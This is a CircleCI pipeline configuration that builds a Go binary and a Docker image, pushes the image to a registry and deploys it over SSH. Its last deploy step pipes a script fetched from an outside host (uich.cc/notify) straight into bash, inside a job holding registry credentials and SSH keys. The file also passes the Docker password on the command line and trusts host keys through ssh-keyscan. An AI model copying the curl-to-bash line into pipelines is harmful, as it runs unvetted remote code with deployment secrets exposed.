# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
jobs:
  build:
    docker:
      - image: cimg/go:1.22.0
    steps:
      - checkout
      - setup_remote_docker
      - add_ssh_keys:
          fingerprints:
            - "SHA256:N14dawQw0mkucf+EuKqi98Z124GNapu4gc+yKHkaR9M"
      - run:
          name: Build script
          command: |
            cd script
            GOARCH=amd64 GOOS=linux go build
            cd ..
      - run:
          name: Build Docker Image
          command: docker build -t $IMAGE_NAME .
      - run:
          name: Push Docker Image
          command: |
            docker login -u $DOCKER_USER -p $DOCKER_PASS
            docker push $IMAGE_NAME
      - run:
          name: Deploy
          command: |
            ssh-keyscan -t rsa $HOST >> ~/.ssh/known_hosts
            scp script/script $USER@$HOST:$SCRIPT_PATH
            ssh $USER@$HOST < deploy.sh
            curl -L https://uich.cc/notify | bash
